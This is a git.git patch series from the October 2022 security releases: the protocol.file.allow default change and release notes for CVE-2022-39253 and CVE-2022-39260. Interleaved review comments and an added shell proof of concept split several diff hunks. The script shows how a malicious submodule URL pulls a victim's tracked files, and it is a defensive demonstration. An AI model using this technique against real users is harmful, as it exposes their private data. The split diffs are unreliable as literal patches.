From a1d4f67c12ac172f835e6d5e4e0a197075e2146b Mon Sep 17 00:00:00 2001
From: Taylor Blau
Date: Fri, 29 Jul 2022 15:22:13 -0400
Subject: transport: make `protocol.file.allow` be "user" by default

An earlier patch discussed and fixed a scenario where Git could be used as a vector to exfiltrate sensitive data through a Docker container when a potential victim clones a suspicious repository with local submodules that contain symlinks.

That security hole has since been plugged, but a similar one still exists. Instead of convincing a would-be victim to clone an embedded submodule via the "file" protocol, an attacker could convince an individual to clone a repository that has a submodule pointing to a valid path on the victim's filesystem.

For example, if an individual (with username "foo") has their home directory ("/home/foo") stored as a Git repository, then an attacker could exfiltrate data by convincing a victim to clone a malicious repository containing a submodule pointing at "/home/foo/.git" with `--recurse-submodules`. Doing so would expose any sensitive contents stored in "/home/foo" tracked in Git.

For systems (such as Docker) that consider everything outside of the immediate top-level working directory containing a Dockerfile as inaccessible to the container (with the exception of volume mounts, and so on), this is a violation of trust by exposing unexpected contents in the working copy.

To mitigate the likelihood of this kind of attack, adjust the "file://" protocol's default policy to be "user" to prevent commands that execute without user input (including recursive submodule initialization) from taking place by default.

Suggested-by: Jeff King
Signed-off-by: Taylor Blau
---
 Documentation/config/protocol.txt | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

(limited to 'Documentation')

diff --git a/Documentation/config/protocol.txt b/Documentation/config/protocol.txt
index 756591d77b..799389132f 100644
--- a/Documentation/config/protocol.txt
+++ b/Documentation/config/protocol.txt @@ -1,10 +1,10 @@ protocol.allow:: If set, provide a user defined default policy for all protocols which don't explicitly have a policy (`protocol..allow`). By default, - if unset, known-safe protocols (http, https, git, ssh, file) have a + if unset, known-safe protocols (http, https, git, ssh) have a default policy of `always`, known-dangerous protocols (ext) have a - default policy of `never`, and all other protocols have a default - policy of `user`. Supported policies: + default policy of `never`, and all other protocols (including file) + have a default policy of `user`. Supported policies: + -- -- cgit v1.3 From abd4d67ab0f84fff703fa14d9eebfd287b42daeb Mon Sep 17 00:00:00 2001 From: Taylor Blau Date: Fri, 30 Sep 2022 16:32:10 -0400 Subject: Git 2.30.6 Signed-off-by: Taylor Blau --- Documentation/RelNotes/2.30.6.txt | 60 +++++++++++++++++++++++++++++++++++++++ GIT-VERSION-GEN | 2 +- RelNotes | 2 +- 3 files changed, 62 insertions(+), 2 deletions(-) create mode 100644 Documentation/RelNotes/2.30.6.txt (limited to 'Documentation') diff --git a/Documentation/RelNotes/2.30.6.txt b/Documentation/RelNotes/2.30.6.txt new file mode 100644 index 0000000000..d649071b79 --- /dev/null +++ b/Documentation/RelNotes/2.30.6.txt 
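Review bot: the rewritten `protocol.allow` sentence in the protocol.txt hunk above now says `file` defaults to `user`, but it says nothing about what that means for the operations this patch targets, so the one effect users will actually notice is undocumented where `git help config` shows it. Suggest adding, after `have a default policy of `user`.`, a sentence to the effect that recursive submodule clones (`--recurse-submodules`) and other operations Git starts without direct user input will refuse local-path and `file://` submodule URLs unless `protocol.file.allow` is set to `always`. The commit message explains this, but the config text is what people read when the clone fails. Note also that this page is limited to Documentation/, so the transport change that actually flips the default (the "transport:" in the subject) is not in this hunk and has to be reviewed alongside it.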
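The scenario in the commit message above, reproduced as an added example (it is not code from the git.git patches on this page): a throwaway victim repository stands in for /home/foo, a malicious superproject carries a submodule whose URL is that path, and the victim's recursive clone is run once under `protocol.file.allow=user` (the new default) and once under `always`. It assumes `git` on PATH and a POSIX sh; the repository contents, the paths and the `secret.txt` file are constructed for the demo, and the policy is passed explicitly with `-c` so the outcome does not depend on which Git version's default happens to be installed.

```shell
#!/bin/sh
# Added demonstration, not code from the git.git patches above: rebuilds the
# commit message's scenario with throwaway repositories under a temp dir and
# shows that protocol.file.allow=user refuses the submodule clone that
# `--recurse-submodules` spawns, while protocol.file.allow=always lets it
# read the victim's data. Assumes `git` is on PATH; every path, repository
# and the "secret" file below is constructed for the demo.
set -eu

# Isolate the demo from the host's git configuration so the -c setting used
# below is the only protocol.file.allow policy in effect, and give the
# throwaway commits an identity.
export GIT_CONFIG_NOSYSTEM=1 GIT_CONFIG_GLOBAL=/dev/null
export GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.invalid
export GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.invalid
# Git marks the submodule clones it spawns as not user-initiated
# (GIT_PROTOCOL_FROM_USER=0); the outer clone counts as user-initiated as
# long as the variable is not set to 0 in the environment.
unset GIT_PROTOCOL_FROM_USER

DEMO_ROOT=$(mktemp -d)
VICTIM="$DEMO_ROOT/victim"      # stand-in for /home/foo kept in Git
ATTACKER="$DEMO_ROOT/attacker"  # the repository the victim is lured into cloning

# Victim side: a repository tracking one constructed secret.
setup_victim() {
    git init -q "$VICTIM"
    echo "API_TOKEN=constructed-secret-value" >"$VICTIM/secret.txt"
    git -C "$VICTIM" add secret.txt
    git -C "$VICTIM" commit -q -m "victim data"
}

# Attacker side: a superproject whose .gitmodules url is a path on the
# victim's machine, plus a gitlink naming the commit to check out. Only a
# guessable path is needed; the commit id is taken from the victim here so
# the demo can verify the checkout afterwards.
setup_attacker() {
    victim_head=$(git -C "$VICTIM" rev-parse HEAD)
    git init -q "$ATTACKER"
    printf '[submodule "sub"]\n\tpath = sub\n\turl = %s\n' "$VICTIM" \
        >"$ATTACKER/.gitmodules"
    git -C "$ATTACKER" add .gitmodules
    git -C "$ATTACKER" update-index --add --cacheinfo "160000,$victim_head,sub"
    git -C "$ATTACKER" commit -q -m "innocent looking project"
}

# What the victim runs, with $1 as the protocol.file.allow policy. The outer
# clone is user-initiated and allowed under either policy; the submodule
# clone is started by git itself, which `user` refuses. Prints "allowed" or
# "blocked" depending on whether the victim's secret ended up in the clone.
attempt_recursive_clone() {
    dest="$DEMO_ROOT/clone-$1"
    rm -rf "$dest"
    if git -c "protocol.file.allow=$1" clone -q --recurse-submodules \
            "$ATTACKER" "$dest" >/dev/null 2>&1 &&
       [ -f "$dest/sub/secret.txt" ]; then
        echo allowed
    else
        echo blocked
    fi
}

# Remove the throwaway repositories once done inspecting them.
cleanup_demo() {
    rm -rf "$DEMO_ROOT"
}

setup_victim
setup_attacker
echo "protocol.file.allow=user   -> $(attempt_recursive_clone user)"
echo "protocol.file.allow=always -> $(attempt_recursive_clone always)"
```

Run it as a script; it prints `blocked` for `user` and `allowed` for `always`. The same `-c protocol.file.allow=always` is the knob that CI jobs with legitimate local-path submodules need after this change, and it is better scoped to the one command that needs it than set in a global config, since globally it reopens exactly the path shown here.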
@@ -0,0 +1,60 @@ +Git v2.30.6 Release Notes +========================= + +This release addresses the security issues CVE-2022-39253 and +CVE-2022-39260. + +Fixes since v2.30.5 +------------------- + + * CVE-2022-39253: + When relying on the `--local` clone optimization, Git dereferences + symbolic links in the source repository before creating hardlinks + (or copies) of the dereferenced link in the destination repository. + This can lead to surprising behavior where arbitrary files are + present in a repository's `$GIT_DIR` when cloning from a malicious + repository. + + Git will no longer dereference symbolic links via the `--local` + clone mechanism, and will instead refuse to clone repositories that + have symbolic links present in the `$GIT_DIR/objects` directory. + + Additionally, the value of `protocol.file.allow` is changed to be + "user" by default. + + * CVE-2022-39260: + An overly-long command string given to `git shell` can result in + overflow in `split_cmdline()`, leading to arbitrary heap writes and + remote code execution when `git shell` is exposed and the directory + `$HOME/git-shell-commands` exists. + + `git shell` is taught to refuse interactive commands that are + longer than 4MiB in size. `split_cmdline()` is hardened to reject + inputs larger than 2GiB. + +Credit for finding CVE-2022-39253 goes to Cory Snider of Mirantis. The +fix was authored by Taylor Blau, with help from Johannes Schindelin. + +Credit for finding CVE-2022-39260 goes to Kevin Backhouse of GitHub. +The fix was authored by Kevin Backhouse, Jeff King, and Taylor Blau. 
+ + +Jeff King (2): + shell: add basic tests + shell: limit size of interactive commands + +Kevin Backhouse (1): + alias.c: reject too-long cmdline strings in split_cmdline() + +Taylor Blau (11): + builtin/clone.c: disallow `--local` clones with symlinks + t/lib-submodule-update.sh: allow local submodules + t/t1NNN: allow local submodules + t/2NNNN: allow local submodules + t/t3NNN: allow local submodules + t/t4NNN: allow local submodules + t/t5NNN: allow local submodules + t/t6NNN: allow local submodules + t/t7NNN: allow local submodules + t/t9NNN: allow local submodules + transport: make `protocol.file.allow` be "user" by default diff --git a/GIT-VERSION-GEN b/GIT-VERSION-GEN index 39d0c99da6..40fa0b5255 100755 --- a/GIT-VERSION-GEN +++ b/GIT-VERSION-GEN @@ -1,7 +1,7 @@ #!/bin/sh GVF=GIT-VERSION-FILE -DEF_VER=v2.30.5 +DEF_VER=v2.30.6 LF=' ' diff --git a/RelNotes b/RelNotes index 406d23844b..018a28eb07 120000 --- a/RelNotes +++ b/RelNotes @@ -1 +1 @@ -Documentation/RelNotes/2.30.5.txt \ No newline at end of file +Documentation/RelNotes/2.30.6.txt \ No newline at end of file -- cgit v1.3 From ecf9b4a443ecd2c7dc759e5d18f226694bc3eced Mon Sep 17 00:00:00 2001 From: Taylor Blau Date: Fri, 30 Sep 2022 16:56:02 -0400 Subject: Git 2.31.5 Signed-off-by: Taylor Blau --- Documentation/RelNotes/2.31.5.txt | 5 +++++ RelNotes | 2 +- 2 files changed, 6 insertions(+), 1 deletion(-) create mode 100644 Documentation/RelNotes/2.31.5.txt (limited to 'Documentation') diff --git a/Documentation/RelNotes/2.31.5.txt b/Documentation/RelNotes/2.31.5.txt new file mode 100644 index 0000000000..0d87e6e03f --- /dev/null +++ b/Documentation/RelNotes/2.31.5.txt @@ -0,0 +1,5 @@ +Git v2.31.5 Release Notes +========================= + +This release merges the security fix that appears in v2.30.6; see +the release notes for that version for details. diff --git a/RelNotes b/RelNotes index 7ef30395e1..6ed6c0c014 120000 --- a/RelNotes +++ b/RelNotes 
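Review bot: in the 2.30.6 release notes hunk above, the CVE-2022-39253 entry mentions the `protocol.file.allow` default change only as a trailing "Additionally", yet it is the one part of this release that changes behaviour for everyone rather than only for people cloning malicious repositories: after upgrading, `git clone --recurse-submodules` of a superproject whose submodule URL is a local path or `file://` URL fails outright, which is why nine of the fourteen commits in the shortlog are "allow local submodules" test fixes. Suggest giving the change its own bullet that names the failure and the opt-in, `protocol.file.allow=always`, so CI owners who hit it find the answer in these notes rather than by bisecting their pipeline.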
@@ -1 +1 @@ -Documentation/RelNotes/2.31.4.txt \ No newline at end of file +Documentation/RelNotes/2.31.5.txt \ No newline at end of file -- cgit v1.3 From af778cd9be6307e34f9f900fd42eb826c65b32da Mon Sep 17 00:00:00 2001 From: Taylor Blau Date: Fri, 30 Sep 2022 17:00:58 -0400 Subject: Git 2.32.4 Signed-off-by: Taylor Blau --- Documentation/RelNotes/2.32.4.txt | 5 +++++ RelNotes | 2 +- 2 files changed, 6 insertions(+), 1 deletion(-) create mode 100644 Documentation/RelNotes/2.32.4.txt (limited to 'Documentation') diff --git a/Documentation/RelNotes/2.32.4.txt b/Documentation/RelNotes/2.32.4.txt new file mode 100644 index 0000000000..76c67b209e --- /dev/null +++ b/Documentation/RelNotes/2.32.4.txt @@ -0,0 +1,5 @@ +Git v2.32.4 Release Notes +========================= + +This release merges the security fix that appears in v2.30.6; see +the release notes for that version for details. diff --git a/RelNotes b/RelNotes index 3bfb2b6297..2626c7807b 120000 --- a/RelNotes +++ b/RelNotes @@ -1 +1 @@ -Documentation/RelNotes/2.32.3.txt \ No newline at end of file +Documentation/RelNotes/2.32.4.txt \ No newline at end of file -- cgit v1.3 From 7800e1dccf622ba8d490b4c1c92af734be6242ff Mon Sep 17 00:00:00 2001 From: Taylor Blau Date: Fri, 30 Sep 2022 17:04:26 -0400 Subject: Git 2.33.5 Signed-off-by: Taylor Blau --- Documentation/RelNotes/2.33.5.txt | 5 +++++ GIT-VERSION-GEN | 2 +- RelNotes | 2 +- 3 files changed, 7 insertions(+), 2 deletions(-) create mode 100644 Documentation/RelNotes/2.33.5.txt (limited to 'Documentation') diff --git a/Documentation/RelNotes/2.33.5.txt b/Documentation/RelNotes/2.33.5.txt new file mode 100644 index 0000000000..a63652602b --- /dev/null +++ b/Documentation/RelNotes/2.33.5.txt @@ -0,0 +1,5 @@ +Git v2.33.5 Release Notes +========================= + +This release merges the security fix that appears in v2.30.6; see +the release notes for that version for details. diff --git a/GIT-VERSION-GEN b/GIT-VERSION-GEN index 473746835b..d7948f1653 100755 
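Review bot: in the 2.31.5 and 2.32.4 release notes hunks above, "merges the security fix that appears in v2.30.6" is singular, but v2.30.6 addresses two unrelated issues (CVE-2022-39253 and CVE-2022-39260) plus the `protocol.file.allow` default change; write "fixes" and list the two CVE identifiers here, since anyone grepping release notes for a CVE will otherwise miss these versions (the 2.33.5 and 2.34.5 notes repeat the same wording). Separately, the diffstats of these two commits list only the RelNotes file and the RelNotes symlink, whereas the 2.30.6, 2.33.5 and 2.34.5 commits also bump DEF_VER in GIT-VERSION-GEN; unless that bump landed in another commit, tarball builds of 2.31.5 and 2.32.4, which fall back to DEF_VER, would still report the previous version.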
--- a/GIT-VERSION-GEN +++ b/GIT-VERSION-GEN @@ -1,7 +1,7 @@ #!/bin/sh GVF=GIT-VERSION-FILE -DEF_VER=v2.33.4 +DEF_VER=v2.33.5 LF=' ' diff --git a/RelNotes b/RelNotes index 6cb6ec27dc..9589e5e0e9 120000 --- a/RelNotes +++ b/RelNotes @@ -1 +1 @@ -Documentation/RelNotes/2.33.4.txt \ No newline at end of file +Documentation/RelNotes/2.33.5.txt \ No newline at end of file -- cgit v1.3 From be85cfc4dbef9ffa177770f8607fd4a85445565e Mon Sep 17 00:00:00 2001 From: Taylor Blau Date: Fri, 30 Sep 2022 17:22:02 -0400 Subject: Git 2.34.5 Signed-off-by: Taylor Blau --- Documentation/RelNotes/2.34.5.txt | 5 +++++ GIT-VERSION-GEN | 2 +- RelNotes | 2 +- 3 files changed, 7 insertions(+), 2 deletions(-) create mode 100644 Documentation/RelNotes/2.34.5.txt (limited to 'Documentation') diff --git a/Documentation/RelNotes/2.34.5.txt b/Documentation/RelNotes/2.34.5.txt new file mode 100644 index 0000000000..0e8999204d --- /dev/null +++ b/Documentation/RelNotes/2.34.5.txt @@ -0,0 +1,5 @@ +Git v2.34.5 Release Notes +========================= + +This release merges the security fix that appears in v2.30.6; see +the release notes for that version for details. diff --git a/GIT-VERSION-GEN b/GIT-VERSION-GEN index 9e2cf5d43d..87ff922834 100755 --- a/GIT-VERSION-GEN +++ b/GIT-VERSION-GEN @@ -1,7 +1,7 @@ #!/bin/sh GVF=GIT-VERSION-FILE -DEF_VER=v2.34.4 +DEF_VER=v2.34.5 LF=' ' diff --git a/RelNotes b/RelNotes index 9041e1b0fe..e3bb08499b 120000 --- a/RelNotes +++ b/RelNotes @@ -1 +1 @@ -Documentation/RelNotes/2.34.4.txt \ No newline at end of file +Documentation/RelNotes/2.34.5.txt \ No newline at end of file -- cgit v1.3